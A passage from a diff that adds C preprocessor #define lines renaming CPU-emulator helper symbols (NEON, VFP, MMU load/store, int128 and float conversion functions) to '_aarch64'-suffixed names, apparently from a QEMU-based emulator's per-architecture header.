+#define helper_ldq_mmu helper_ldq_mmu_aarch64 +#define helper_ldw_cmmu helper_ldw_cmmu_aarch64 +#define helper_ldw_mmu helper_ldw_mmu_aarch64 +#define helper_le_ldl_cmmu helper_le_ldl_cmmu_aarch64 +#define helper_le_ldq_cmmu helper_le_ldq_cmmu_aarch64 +#define helper_le_ldq_mmu helper_le_ldq_mmu_aarch64 +#define helper_le_ldsl_mmu helper_le_ldsl_mmu_aarch64 +#define helper_le_ldsw_mmu helper_le_ldsw_mmu_aarch64 +#define helper_le_ldul_mmu helper_le_ldul_mmu_aarch64 +#define helper_le_lduw_mmu helper_le_lduw_mmu_aarch64 +#define helper_le_ldw_cmmu helper_le_ldw_cmmu_aarch64 +#define helper_le_stl_mmu helper_le_stl_mmu_aarch64 +#define helper_le_stq_mmu helper_le_stq_mmu_aarch64 +#define helper_le_stw_mmu helper_le_stw_mmu_aarch64 +#define helper_msr_i_pstate helper_msr_i_pstate_aarch64 +#define helper_neon_abd_f32 helper_neon_abd_f32_aarch64 +#define helper_neon_abdl_s16 helper_neon_abdl_s16_aarch64 +#define helper_neon_abdl_s32 helper_neon_abdl_s32_aarch64 +#define helper_neon_abdl_s64 helper_neon_abdl_s64_aarch64 +#define helper_neon_abdl_u16 helper_neon_abdl_u16_aarch64 +#define helper_neon_abdl_u32 helper_neon_abdl_u32_aarch64 +#define helper_neon_abdl_u64 helper_neon_abdl_u64_aarch64 +#define helper_neon_abd_s16 helper_neon_abd_s16_aarch64 +#define helper_neon_abd_s32 helper_neon_abd_s32_aarch64 +#define helper_neon_abd_s8 helper_neon_abd_s8_aarch64 +#define helper_neon_abd_u16 helper_neon_abd_u16_aarch64 +#define helper_neon_abd_u32 helper_neon_abd_u32_aarch64 +#define helper_neon_abd_u8 helper_neon_abd_u8_aarch64 +#define helper_neon_abs_s16 helper_neon_abs_s16_aarch64 +#define helper_neon_abs_s8 helper_neon_abs_s8_aarch64 +#define helper_neon_acge_f32 helper_neon_acge_f32_aarch64 +#define helper_neon_acge_f64 helper_neon_acge_f64_aarch64 +#define helper_neon_acgt_f32 helper_neon_acgt_f32_aarch64 +#define helper_neon_acgt_f64 helper_neon_acgt_f64_aarch64 +#define helper_neon_addl_saturate_s32 helper_neon_addl_saturate_s32_aarch64 +#define helper_neon_addl_saturate_s64 helper_neon_addl_saturate_s64_aarch64 +#define helper_neon_addl_u16 helper_neon_addl_u16_aarch64 +#define helper_neon_addl_u32 helper_neon_addl_u32_aarch64 +#define helper_neon_add_u16 helper_neon_add_u16_aarch64 +#define helper_neon_add_u8 helper_neon_add_u8_aarch64 +#define helper_neon_ceq_f32 helper_neon_ceq_f32_aarch64 +#define helper_neon_ceq_u16 helper_neon_ceq_u16_aarch64 +#define helper_neon_ceq_u32 helper_neon_ceq_u32_aarch64 +#define helper_neon_ceq_u8 helper_neon_ceq_u8_aarch64 +#define helper_neon_cge_f32 helper_neon_cge_f32_aarch64 +#define helper_neon_cge_s16 helper_neon_cge_s16_aarch64 +#define helper_neon_cge_s32 helper_neon_cge_s32_aarch64 +#define helper_neon_cge_s8 helper_neon_cge_s8_aarch64 +#define helper_neon_cge_u16 helper_neon_cge_u16_aarch64 +#define helper_neon_cge_u32 helper_neon_cge_u32_aarch64 +#define helper_neon_cge_u8 helper_neon_cge_u8_aarch64 +#define helper_neon_cgt_f32 helper_neon_cgt_f32_aarch64 +#define helper_neon_cgt_s16 helper_neon_cgt_s16_aarch64 +#define helper_neon_cgt_s32 helper_neon_cgt_s32_aarch64 +#define helper_neon_cgt_s8 helper_neon_cgt_s8_aarch64 +#define helper_neon_cgt_u16 helper_neon_cgt_u16_aarch64 +#define helper_neon_cgt_u32 helper_neon_cgt_u32_aarch64 +#define helper_neon_cgt_u8 helper_neon_cgt_u8_aarch64 +#define helper_neon_cls_s16 helper_neon_cls_s16_aarch64 +#define helper_neon_cls_s32 helper_neon_cls_s32_aarch64 +#define helper_neon_cls_s8 helper_neon_cls_s8_aarch64 +#define helper_neon_clz_u16 helper_neon_clz_u16_aarch64 +#define helper_neon_clz_u8 helper_neon_clz_u8_aarch64 +#define helper_neon_cnt_u8 helper_neon_cnt_u8_aarch64 +#define helper_neon_fcvt_f16_to_f32 helper_neon_fcvt_f16_to_f32_aarch64 +#define helper_neon_fcvt_f32_to_f16 helper_neon_fcvt_f32_to_f16_aarch64 +#define helper_neon_hadd_s16 helper_neon_hadd_s16_aarch64 +#define helper_neon_hadd_s32 helper_neon_hadd_s32_aarch64 +#define helper_neon_hadd_s8 helper_neon_hadd_s8_aarch64 +#define helper_neon_hadd_u16 helper_neon_hadd_u16_aarch64 +#define helper_neon_hadd_u32 helper_neon_hadd_u32_aarch64 +#define helper_neon_hadd_u8 helper_neon_hadd_u8_aarch64 +#define helper_neon_hsub_s16 helper_neon_hsub_s16_aarch64 +#define helper_neon_hsub_s32 helper_neon_hsub_s32_aarch64 +#define helper_neon_hsub_s8 helper_neon_hsub_s8_aarch64 +#define helper_neon_hsub_u16 helper_neon_hsub_u16_aarch64 +#define helper_neon_hsub_u32 helper_neon_hsub_u32_aarch64 +#define helper_neon_hsub_u8 helper_neon_hsub_u8_aarch64 +#define helper_neon_max_s16 helper_neon_max_s16_aarch64 +#define helper_neon_max_s32 helper_neon_max_s32_aarch64 +#define helper_neon_max_s8 helper_neon_max_s8_aarch64 +#define helper_neon_max_u16 helper_neon_max_u16_aarch64 +#define helper_neon_max_u32 helper_neon_max_u32_aarch64 +#define helper_neon_max_u8 helper_neon_max_u8_aarch64 +#define helper_neon_min_s16 helper_neon_min_s16_aarch64 +#define helper_neon_min_s32 helper_neon_min_s32_aarch64 +#define helper_neon_min_s8 helper_neon_min_s8_aarch64 +#define helper_neon_min_u16 helper_neon_min_u16_aarch64 +#define helper_neon_min_u32 helper_neon_min_u32_aarch64 +#define helper_neon_min_u8 helper_neon_min_u8_aarch64 +#define helper_neon_mull_p8 helper_neon_mull_p8_aarch64 +#define helper_neon_mull_s16 helper_neon_mull_s16_aarch64 +#define helper_neon_mull_s8 helper_neon_mull_s8_aarch64 +#define helper_neon_mull_u16 helper_neon_mull_u16_aarch64 +#define helper_neon_mull_u8 helper_neon_mull_u8_aarch64 +#define helper_neon_mul_p8 helper_neon_mul_p8_aarch64 +#define helper_neon_mul_u16 helper_neon_mul_u16_aarch64 +#define helper_neon_mul_u8 helper_neon_mul_u8_aarch64 +#define helper_neon_narrow_high_u16 helper_neon_narrow_high_u16_aarch64 +#define helper_neon_narrow_high_u8 helper_neon_narrow_high_u8_aarch64 +#define helper_neon_narrow_round_high_u16 helper_neon_narrow_round_high_u16_aarch64 +#define helper_neon_narrow_round_high_u8 helper_neon_narrow_round_high_u8_aarch64 +#define helper_neon_narrow_sat_s16 helper_neon_narrow_sat_s16_aarch64 +#define helper_neon_narrow_sat_s32 helper_neon_narrow_sat_s32_aarch64 +#define helper_neon_narrow_sat_s8 helper_neon_narrow_sat_s8_aarch64 +#define helper_neon_narrow_sat_u16 helper_neon_narrow_sat_u16_aarch64 +#define helper_neon_narrow_sat_u32 helper_neon_narrow_sat_u32_aarch64 +#define helper_neon_narrow_sat_u8 helper_neon_narrow_sat_u8_aarch64 +#define helper_neon_narrow_u16 helper_neon_narrow_u16_aarch64 +#define helper_neon_narrow_u8 helper_neon_narrow_u8_aarch64 +#define helper_neon_negl_u16 helper_neon_negl_u16_aarch64 +#define helper_neon_negl_u32 helper_neon_negl_u32_aarch64 +#define helper_neon_paddl_u16 helper_neon_paddl_u16_aarch64 +#define helper_neon_paddl_u32 helper_neon_paddl_u32_aarch64 +#define helper_neon_padd_u16 helper_neon_padd_u16_aarch64 +#define helper_neon_padd_u8 helper_neon_padd_u8_aarch64 +#define helper_neon_pmax_s16 helper_neon_pmax_s16_aarch64 +#define helper_neon_pmax_s8 helper_neon_pmax_s8_aarch64 +#define helper_neon_pmax_u16 helper_neon_pmax_u16_aarch64 +#define helper_neon_pmax_u8 helper_neon_pmax_u8_aarch64 +#define helper_neon_pmin_s16 helper_neon_pmin_s16_aarch64 +#define helper_neon_pmin_s8 helper_neon_pmin_s8_aarch64 +#define helper_neon_pmin_u16 helper_neon_pmin_u16_aarch64 +#define helper_neon_pmin_u8 helper_neon_pmin_u8_aarch64 +#define helper_neon_pmull_64_hi helper_neon_pmull_64_hi_aarch64 +#define helper_neon_pmull_64_lo helper_neon_pmull_64_lo_aarch64 +#define helper_neon_qabs_s16 helper_neon_qabs_s16_aarch64 +#define helper_neon_qabs_s32 helper_neon_qabs_s32_aarch64 +#define helper_neon_qabs_s64 helper_neon_qabs_s64_aarch64 +#define helper_neon_qabs_s8 helper_neon_qabs_s8_aarch64 +#define helper_neon_qadd_s16 helper_neon_qadd_s16_aarch64 +#define helper_neon_qadd_s32 helper_neon_qadd_s32_aarch64 +#define helper_neon_qadd_s64 helper_neon_qadd_s64_aarch64 +#define helper_neon_qadd_s8 helper_neon_qadd_s8_aarch64 +#define helper_neon_qadd_u16 helper_neon_qadd_u16_aarch64 +#define helper_neon_qadd_u32 helper_neon_qadd_u32_aarch64 +#define helper_neon_qadd_u64 helper_neon_qadd_u64_aarch64 +#define helper_neon_qadd_u8 helper_neon_qadd_u8_aarch64 +#define helper_neon_qdmulh_s16 helper_neon_qdmulh_s16_aarch64 +#define helper_neon_qdmulh_s32 helper_neon_qdmulh_s32_aarch64 +#define helper_neon_qneg_s16 helper_neon_qneg_s16_aarch64 +#define helper_neon_qneg_s32 helper_neon_qneg_s32_aarch64 +#define helper_neon_qneg_s64 helper_neon_qneg_s64_aarch64 +#define helper_neon_qneg_s8 helper_neon_qneg_s8_aarch64 +#define helper_neon_qrdmulh_s16 helper_neon_qrdmulh_s16_aarch64 +#define helper_neon_qrdmulh_s32 helper_neon_qrdmulh_s32_aarch64 +#define helper_neon_qrshl_s16 helper_neon_qrshl_s16_aarch64 +#define helper_neon_qrshl_s32 helper_neon_qrshl_s32_aarch64 +#define helper_neon_qrshl_s64 helper_neon_qrshl_s64_aarch64 +#define helper_neon_qrshl_s8 helper_neon_qrshl_s8_aarch64 +#define helper_neon_qrshl_u16 helper_neon_qrshl_u16_aarch64 +#define helper_neon_qrshl_u32 helper_neon_qrshl_u32_aarch64 +#define helper_neon_qrshl_u64 helper_neon_qrshl_u64_aarch64 +#define helper_neon_qrshl_u8 helper_neon_qrshl_u8_aarch64 +#define helper_neon_qshl_s16 helper_neon_qshl_s16_aarch64 +#define helper_neon_qshl_s32 helper_neon_qshl_s32_aarch64 +#define helper_neon_qshl_s64 helper_neon_qshl_s64_aarch64 +#define helper_neon_qshl_s8 helper_neon_qshl_s8_aarch64 +#define helper_neon_qshl_u16 helper_neon_qshl_u16_aarch64 +#define helper_neon_qshl_u32 helper_neon_qshl_u32_aarch64 +#define helper_neon_qshl_u64 helper_neon_qshl_u64_aarch64 +#define helper_neon_qshl_u8 helper_neon_qshl_u8_aarch64 +#define helper_neon_qshlu_s16 helper_neon_qshlu_s16_aarch64 +#define helper_neon_qshlu_s32 helper_neon_qshlu_s32_aarch64 +#define helper_neon_qshlu_s64 helper_neon_qshlu_s64_aarch64 +#define helper_neon_qshlu_s8 helper_neon_qshlu_s8_aarch64 +#define helper_neon_qsub_s16 helper_neon_qsub_s16_aarch64 +#define helper_neon_qsub_s32 helper_neon_qsub_s32_aarch64 +#define helper_neon_qsub_s64 helper_neon_qsub_s64_aarch64 +#define helper_neon_qsub_s8 helper_neon_qsub_s8_aarch64 +#define helper_neon_qsub_u16 helper_neon_qsub_u16_aarch64 +#define helper_neon_qsub_u32 helper_neon_qsub_u32_aarch64 +#define helper_neon_qsub_u64 helper_neon_qsub_u64_aarch64 +#define helper_neon_qsub_u8 helper_neon_qsub_u8_aarch64 +#define helper_neon_qunzip16 helper_neon_qunzip16_aarch64 +#define helper_neon_qunzip32 helper_neon_qunzip32_aarch64 +#define helper_neon_qunzip8 helper_neon_qunzip8_aarch64 +#define helper_neon_qzip16 helper_neon_qzip16_aarch64 +#define helper_neon_qzip32 helper_neon_qzip32_aarch64 +#define helper_neon_qzip8 helper_neon_qzip8_aarch64 +#define helper_neon_rbit_u8 helper_neon_rbit_u8_aarch64 +#define helper_neon_rhadd_s16 helper_neon_rhadd_s16_aarch64 +#define helper_neon_rhadd_s32 helper_neon_rhadd_s32_aarch64 +#define helper_neon_rhadd_s8 helper_neon_rhadd_s8_aarch64 +#define helper_neon_rhadd_u16 helper_neon_rhadd_u16_aarch64 +#define helper_neon_rhadd_u32 helper_neon_rhadd_u32_aarch64 +#define helper_neon_rhadd_u8 helper_neon_rhadd_u8_aarch64 +#define helper_neon_rshl_s16 helper_neon_rshl_s16_aarch64 +#define helper_neon_rshl_s32 helper_neon_rshl_s32_aarch64 +#define helper_neon_rshl_s64 helper_neon_rshl_s64_aarch64 +#define helper_neon_rshl_s8 helper_neon_rshl_s8_aarch64 +#define helper_neon_rshl_u16 helper_neon_rshl_u16_aarch64 +#define helper_neon_rshl_u32 helper_neon_rshl_u32_aarch64 +#define helper_neon_rshl_u64 helper_neon_rshl_u64_aarch64 +#define helper_neon_rshl_u8 helper_neon_rshl_u8_aarch64 +#define helper_neon_shl_s16 helper_neon_shl_s16_aarch64 +#define helper_neon_shl_s32 helper_neon_shl_s32_aarch64 +#define helper_neon_shl_s64 helper_neon_shl_s64_aarch64 +#define helper_neon_shl_s8 helper_neon_shl_s8_aarch64 +#define helper_neon_shl_u16 helper_neon_shl_u16_aarch64 +#define helper_neon_shl_u32 helper_neon_shl_u32_aarch64 +#define helper_neon_shl_u64 helper_neon_shl_u64_aarch64 +#define helper_neon_shl_u8 helper_neon_shl_u8_aarch64 +#define helper_neon_sqadd_u16 helper_neon_sqadd_u16_aarch64 +#define helper_neon_sqadd_u32 helper_neon_sqadd_u32_aarch64 +#define helper_neon_sqadd_u64 helper_neon_sqadd_u64_aarch64 +#define helper_neon_sqadd_u8 helper_neon_sqadd_u8_aarch64 +#define helper_neon_subl_u16 helper_neon_subl_u16_aarch64 +#define helper_neon_subl_u32 helper_neon_subl_u32_aarch64 +#define helper_neon_sub_u16 helper_neon_sub_u16_aarch64 +#define helper_neon_sub_u8 helper_neon_sub_u8_aarch64 +#define helper_neon_tbl helper_neon_tbl_aarch64 +#define helper_neon_tst_u16 helper_neon_tst_u16_aarch64 +#define helper_neon_tst_u32 helper_neon_tst_u32_aarch64 +#define helper_neon_tst_u8 helper_neon_tst_u8_aarch64 +#define helper_neon_unarrow_sat16 helper_neon_unarrow_sat16_aarch64 +#define helper_neon_unarrow_sat32 helper_neon_unarrow_sat32_aarch64 +#define helper_neon_unarrow_sat8 helper_neon_unarrow_sat8_aarch64 +#define helper_neon_unzip16 helper_neon_unzip16_aarch64 +#define helper_neon_unzip8 helper_neon_unzip8_aarch64 +#define helper_neon_uqadd_s16 helper_neon_uqadd_s16_aarch64 +#define helper_neon_uqadd_s32 helper_neon_uqadd_s32_aarch64 +#define helper_neon_uqadd_s64 helper_neon_uqadd_s64_aarch64 +#define helper_neon_uqadd_s8 helper_neon_uqadd_s8_aarch64 +#define helper_neon_widen_s16 helper_neon_widen_s16_aarch64 +#define helper_neon_widen_s8 helper_neon_widen_s8_aarch64 +#define helper_neon_widen_u16 helper_neon_widen_u16_aarch64 +#define helper_neon_widen_u8 helper_neon_widen_u8_aarch64 +#define helper_neon_zip16 helper_neon_zip16_aarch64 +#define helper_neon_zip8 helper_neon_zip8_aarch64 +#define helper_pre_hvc helper_pre_hvc_aarch64 +#define helper_pre_smc helper_pre_smc_aarch64 +#define helper_qadd16 helper_qadd16_aarch64 +#define helper_qadd8 helper_qadd8_aarch64 +#define helper_qaddsubx helper_qaddsubx_aarch64 +#define helper_qsub16 helper_qsub16_aarch64 +#define helper_qsub8 helper_qsub8_aarch64 +#define helper_qsubaddx helper_qsubaddx_aarch64 +#define helper_rbit helper_rbit_aarch64 +#define helper_recpe_f32 helper_recpe_f32_aarch64 +#define helper_recpe_f64 helper_recpe_f64_aarch64 +#define helper_recpe_u32 helper_recpe_u32_aarch64 +#define helper_recps_f32 helper_recps_f32_aarch64 +#define helper_ret_ldb_cmmu helper_ret_ldb_cmmu_aarch64 +#define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_aarch64 +#define helper_ret_ldub_mmu helper_ret_ldub_mmu_aarch64 +#define helper_ret_stb_mmu helper_ret_stb_mmu_aarch64 +#define helper_rintd helper_rintd_aarch64 +#define helper_rintd_exact helper_rintd_exact_aarch64 +#define helper_rints helper_rints_aarch64 +#define helper_rints_exact helper_rints_exact_aarch64 +#define helper_ror_cc helper_ror_cc_aarch64 +#define helper_rsqrte_f32 helper_rsqrte_f32_aarch64 +#define helper_rsqrte_f64 helper_rsqrte_f64_aarch64 +#define helper_rsqrte_u32 helper_rsqrte_u32_aarch64 +#define helper_rsqrts_f32 helper_rsqrts_f32_aarch64 +#define helper_sadd16 helper_sadd16_aarch64 +#define helper_sadd8 helper_sadd8_aarch64 +#define helper_saddsubx helper_saddsubx_aarch64 +#define helper_sar_cc helper_sar_cc_aarch64 +#define helper_sdiv helper_sdiv_aarch64 +#define helper_sel_flags helper_sel_flags_aarch64 +#define helper_set_cp_reg helper_set_cp_reg_aarch64 +#define helper_set_cp_reg64 helper_set_cp_reg64_aarch64 +#define helper_set_neon_rmode helper_set_neon_rmode_aarch64 +#define helper_set_r13_banked helper_set_r13_banked_aarch64 +#define helper_set_rmode helper_set_rmode_aarch64 +#define helper_set_user_reg helper_set_user_reg_aarch64 +#define helper_shadd16 helper_shadd16_aarch64 +#define helper_shadd8 helper_shadd8_aarch64 +#define helper_shaddsubx helper_shaddsubx_aarch64 +#define helper_shl_cc helper_shl_cc_aarch64 +#define helper_shr_cc helper_shr_cc_aarch64 +#define helper_shsub16 helper_shsub16_aarch64 +#define helper_shsub8 helper_shsub8_aarch64 +#define helper_shsubaddx helper_shsubaddx_aarch64 +#define helper_ssat helper_ssat_aarch64 +#define helper_ssat16 helper_ssat16_aarch64 +#define helper_ssub16 helper_ssub16_aarch64 +#define helper_ssub8 helper_ssub8_aarch64 +#define helper_ssubaddx helper_ssubaddx_aarch64 +#define helper_stb_mmu helper_stb_mmu_aarch64 +#define helper_stl_mmu helper_stl_mmu_aarch64 +#define helper_stq_mmu helper_stq_mmu_aarch64 +#define helper_stw_mmu helper_stw_mmu_aarch64 +#define helper_sub_saturate helper_sub_saturate_aarch64 +#define helper_sub_usaturate helper_sub_usaturate_aarch64 +#define helper_sxtb16 helper_sxtb16_aarch64 +#define helper_uadd16 helper_uadd16_aarch64 +#define helper_uadd8 helper_uadd8_aarch64 +#define helper_uaddsubx helper_uaddsubx_aarch64 +#define helper_udiv helper_udiv_aarch64 +#define helper_uhadd16 helper_uhadd16_aarch64 +#define helper_uhadd8 helper_uhadd8_aarch64 +#define helper_uhaddsubx helper_uhaddsubx_aarch64 +#define helper_uhsub16 helper_uhsub16_aarch64 +#define helper_uhsub8 helper_uhsub8_aarch64 +#define helper_uhsubaddx helper_uhsubaddx_aarch64 +#define helper_uqadd16 helper_uqadd16_aarch64 +#define helper_uqadd8 helper_uqadd8_aarch64 +#define helper_uqaddsubx helper_uqaddsubx_aarch64 +#define helper_uqsub16 helper_uqsub16_aarch64 +#define helper_uqsub8 helper_uqsub8_aarch64 +#define helper_uqsubaddx helper_uqsubaddx_aarch64 +#define helper_usad8 helper_usad8_aarch64 +#define helper_usat helper_usat_aarch64 +#define helper_usat16 helper_usat16_aarch64 +#define helper_usub16 helper_usub16_aarch64 +#define helper_usub8 helper_usub8_aarch64 +#define helper_usubaddx helper_usubaddx_aarch64 +#define helper_uxtb16 helper_uxtb16_aarch64 +#define helper_v7m_mrs helper_v7m_mrs_aarch64 +#define helper_v7m_msr helper_v7m_msr_aarch64 +#define helper_vfp_absd helper_vfp_absd_aarch64 +#define helper_vfp_abss helper_vfp_abss_aarch64 +#define helper_vfp_addd helper_vfp_addd_aarch64 +#define helper_vfp_adds helper_vfp_adds_aarch64 +#define helper_vfp_cmpd helper_vfp_cmpd_aarch64 +#define helper_vfp_cmped helper_vfp_cmped_aarch64 +#define helper_vfp_cmpes helper_vfp_cmpes_aarch64 +#define helper_vfp_cmps helper_vfp_cmps_aarch64 +#define helper_vfp_divd helper_vfp_divd_aarch64 +#define helper_vfp_divs helper_vfp_divs_aarch64 +#define helper_vfp_fcvtds helper_vfp_fcvtds_aarch64 +#define helper_vfp_fcvt_f16_to_f32 helper_vfp_fcvt_f16_to_f32_aarch64 +#define helper_vfp_fcvt_f16_to_f64 helper_vfp_fcvt_f16_to_f64_aarch64 +#define helper_vfp_fcvt_f32_to_f16 helper_vfp_fcvt_f32_to_f16_aarch64 +#define helper_vfp_fcvt_f64_to_f16 helper_vfp_fcvt_f64_to_f16_aarch64 +#define helper_vfp_fcvtsd helper_vfp_fcvtsd_aarch64 +#define helper_vfp_get_fpscr helper_vfp_get_fpscr_aarch64 +#define helper_vfp_maxd helper_vfp_maxd_aarch64 +#define helper_vfp_maxnumd helper_vfp_maxnumd_aarch64 +#define helper_vfp_maxnums helper_vfp_maxnums_aarch64 +#define helper_vfp_maxs helper_vfp_maxs_aarch64 +#define helper_vfp_mind helper_vfp_mind_aarch64 +#define helper_vfp_minnumd helper_vfp_minnumd_aarch64 +#define helper_vfp_minnums helper_vfp_minnums_aarch64 +#define helper_vfp_mins helper_vfp_mins_aarch64 +#define helper_vfp_muladdd helper_vfp_muladdd_aarch64 +#define helper_vfp_muladds helper_vfp_muladds_aarch64 +#define helper_vfp_muld helper_vfp_muld_aarch64 +#define helper_vfp_muls helper_vfp_muls_aarch64 +#define helper_vfp_negd helper_vfp_negd_aarch64 +#define helper_vfp_negs helper_vfp_negs_aarch64 +#define helper_vfp_set_fpscr helper_vfp_set_fpscr_aarch64 +#define helper_vfp_shtod helper_vfp_shtod_aarch64 +#define helper_vfp_shtos helper_vfp_shtos_aarch64 +#define helper_vfp_sitod helper_vfp_sitod_aarch64 +#define helper_vfp_sitos helper_vfp_sitos_aarch64 +#define helper_vfp_sltod helper_vfp_sltod_aarch64 +#define helper_vfp_sltos helper_vfp_sltos_aarch64 +#define helper_vfp_sqrtd helper_vfp_sqrtd_aarch64 +#define helper_vfp_sqrts helper_vfp_sqrts_aarch64 +#define helper_vfp_sqtod helper_vfp_sqtod_aarch64 +#define helper_vfp_sqtos helper_vfp_sqtos_aarch64 +#define helper_vfp_subd helper_vfp_subd_aarch64 +#define helper_vfp_subs helper_vfp_subs_aarch64 +#define helper_vfp_toshd helper_vfp_toshd_aarch64 +#define helper_vfp_toshd_round_to_zero helper_vfp_toshd_round_to_zero_aarch64 +#define helper_vfp_toshs helper_vfp_toshs_aarch64 +#define helper_vfp_toshs_round_to_zero helper_vfp_toshs_round_to_zero_aarch64 +#define helper_vfp_tosid helper_vfp_tosid_aarch64 +#define helper_vfp_tosis helper_vfp_tosis_aarch64 +#define helper_vfp_tosizd helper_vfp_tosizd_aarch64 +#define helper_vfp_tosizs helper_vfp_tosizs_aarch64 +#define helper_vfp_tosld helper_vfp_tosld_aarch64 +#define helper_vfp_tosld_round_to_zero helper_vfp_tosld_round_to_zero_aarch64 +#define helper_vfp_tosls helper_vfp_tosls_aarch64 +#define helper_vfp_tosls_round_to_zero helper_vfp_tosls_round_to_zero_aarch64 +#define helper_vfp_tosqd helper_vfp_tosqd_aarch64 +#define helper_vfp_tosqs helper_vfp_tosqs_aarch64 +#define helper_vfp_touhd helper_vfp_touhd_aarch64 +#define helper_vfp_touhd_round_to_zero helper_vfp_touhd_round_to_zero_aarch64 +#define helper_vfp_touhs helper_vfp_touhs_aarch64 +#define helper_vfp_touhs_round_to_zero helper_vfp_touhs_round_to_zero_aarch64 +#define helper_vfp_touid helper_vfp_touid_aarch64 +#define helper_vfp_touis helper_vfp_touis_aarch64 +#define helper_vfp_touizd helper_vfp_touizd_aarch64 +#define helper_vfp_touizs helper_vfp_touizs_aarch64 +#define helper_vfp_tould helper_vfp_tould_aarch64 +#define helper_vfp_tould_round_to_zero helper_vfp_tould_round_to_zero_aarch64 +#define helper_vfp_touls helper_vfp_touls_aarch64 +#define helper_vfp_touls_round_to_zero helper_vfp_touls_round_to_zero_aarch64 +#define helper_vfp_touqd helper_vfp_touqd_aarch64 +#define helper_vfp_touqs helper_vfp_touqs_aarch64 +#define helper_vfp_uhtod helper_vfp_uhtod_aarch64 +#define helper_vfp_uhtos helper_vfp_uhtos_aarch64 +#define helper_vfp_uitod helper_vfp_uitod_aarch64 +#define helper_vfp_uitos helper_vfp_uitos_aarch64 +#define helper_vfp_ultod helper_vfp_ultod_aarch64 +#define helper_vfp_ultos helper_vfp_ultos_aarch64 +#define helper_vfp_uqtod helper_vfp_uqtod_aarch64 +#define helper_vfp_uqtos helper_vfp_uqtos_aarch64 +#define helper_wfe helper_wfe_aarch64 +#define helper_wfi helper_wfi_aarch64 +#define hex2decimal hex2decimal_aarch64 +#define hw_breakpoint_update hw_breakpoint_update_aarch64 +#define hw_breakpoint_update_all hw_breakpoint_update_all_aarch64 +#define hw_watchpoint_update hw_watchpoint_update_aarch64 +#define hw_watchpoint_update_all hw_watchpoint_update_all_aarch64 +#define _init _init_aarch64 +#define init_cpreg_list init_cpreg_list_aarch64 +#define init_lists init_lists_aarch64 +#define input_type_enum input_type_enum_aarch64 +#define int128_2_64 int128_2_64_aarch64 +#define int128_add int128_add_aarch64 +#define int128_addto int128_addto_aarch64 +#define int128_and int128_and_aarch64 +#define int128_eq int128_eq_aarch64 +#define int128_ge int128_ge_aarch64 +#define int128_get64 int128_get64_aarch64 +#define int128_gt int128_gt_aarch64 +#define int128_le int128_le_aarch64 +#define int128_lt int128_lt_aarch64 +#define int128_make64 int128_make64_aarch64 +#define int128_max int128_max_aarch64 +#define int128_min int128_min_aarch64 +#define int128_ne int128_ne_aarch64 +#define int128_neg int128_neg_aarch64 +#define int128_nz int128_nz_aarch64 +#define int128_rshift int128_rshift_aarch64 +#define int128_sub int128_sub_aarch64 +#define int128_subfrom int128_subfrom_aarch64 +#define int128_zero int128_zero_aarch64 +#define int16_to_float32 int16_to_float32_aarch64 +#define int16_to_float64 int16_to_float64_aarch64 +#define int32_to_float128 int32_to_float128_aarch64 +#define int32_to_float32 int32_to_float32_aarch64 +#define int32_to_float64 int32_to_float64_aarch64 +#define int32_to_floatx80 int32_to_floatx80_aarch64 +#define int64_to_float128 int64_to_float128_aarch64 +#define int64_to_float32 int64_to_float32_aarch64 +#define int64_to_float64 int64_to_float64_aarch64 +#define int64_to_floatx80 int64_to_floatx80_aarch64 +#define invalidate_and_set_dirty invalidate_and_set_dirty_aarch64 +#define invalidate_page_bitmap invalidate_page_bitmap_aarch64 +#define io_mem_read io_mem_read_aarch64 +#define io_mem_write io_mem_write_aarch64 +#define io_readb io_readb_aarch64 +#define io_readl io_readl_aarch64 +#define io_readq io_readq_aarch64 +#define io_readw io_readw_aarch64 +#define iotlb_to_region iotlb_to_region_aarch64 +#define io_writeb io_writeb_aarch64 +#define io_writel io_writel_aarch64 +#define io_writeq io_writeq_aarch64 +#define io_writew io_writew_aarch64 +#define is_a64 is_a64_aarch64 +#define is_help_option is_help_option_aarch64 +#define isr_read isr_read_aarch64 +#define is_valid_option_list is_valid_option_list_aarch64 +#define iwmmxt_load_creg iwmmxt_load_creg_aarch64 +#define iwmmxt_load_reg iwmmxt_load_reg_aarch64 +#define iwmmxt_store_creg iwmmxt_store_creg_aarch64 +#define iwmmxt_store_reg iwmmxt_store_reg_aarch64 +#define __jit_debug_descriptor __jit_debug_descriptor_aarch64 +#define __jit_debug_register_code __jit_debug_register_code_aarch64 +#define kvm_to_cpreg_id kvm_to_cpreg_id_aarch64 +#define last_ram_offset last_ram_offset_aarch64 +#define ldl_be_p ldl_be_p_aarch64 +#define ldl_be_phys ldl_be_phys_aarch64 +#define ldl_he_p ldl_he_p_aarch64 +#define ldl_le_p ldl_le_p_aarch64 +#define ldl_le_phys ldl_le_phys_aarch64 +#define ldl_phys ldl_phys_aarch64 +#define ldl_phys_internal ldl_phys_internal_aarch64 +#define ldq_be_p ldq_be_p_aarch64 +#define ldq_be_phys ldq_be_phys_aarch64 +#define ldq_he_p ldq_he_p_aarch64 +#define ldq_le_p ldq_le_p_aarch64 +#define ldq_le_phys ldq_le_phys_aarch64 +#define ldq_phys ldq_phys_aarch64 +#define ldq_phys_internal ldq_phys_internal_aarch64 +#define ldst_name ldst_name_aarch64 +#define ldub_p ldub_p_aarch64 +#define ldub_phys ldub_phys_aarch64 +#define lduw_be_p lduw_be_p_aarch64 +#define lduw_be_phys lduw_be_phys_aarch64 +#define lduw_he_p lduw_he_p_aarch64 +#define lduw_le_p lduw_le_p_aarch64 +#define lduw_le_phys lduw_le_phys_aarch64 +#define lduw_phys lduw_phys_aarch64 +#define lduw_phys_internal lduw_phys_internal_aarch64 +#define le128 le128_aarch64 +#define linked_bp_matches linked_bp_matches_aarch64 +#define listener_add_address_space listener_add_address_space_aarch64 +#define load_cpu_offset load_cpu_offset_aarch64 +#define load_reg load_reg_aarch64 +#define load_reg_var load_reg_var_aarch64 +#define log_cpu_state log_cpu_state_aarch64 +#define lpae_cp_reginfo lpae_cp_reginfo_aarch64 +#define lt128 lt128_aarch64 +#define machine_class_init machine_class_init_aarch64 +#define machine_finalize machine_finalize_aarch64 +#define machine_info machine_info_aarch64 +#define machine_initfn machine_initfn_aarch64 +#define machine_register_types machine_register_types_aarch64 +#define machvirt_init machvirt_init_aarch64 +#define machvirt_machine_init machvirt_machine_init_aarch64 +#define maj maj_aarch64 +#define mapping_conflict mapping_conflict_aarch64 +#define mapping_contiguous mapping_contiguous_aarch64 +#define mapping_have_same_region mapping_have_same_region_aarch64 +#define mapping_merge mapping_merge_aarch64 +#define mem_add mem_add_aarch64 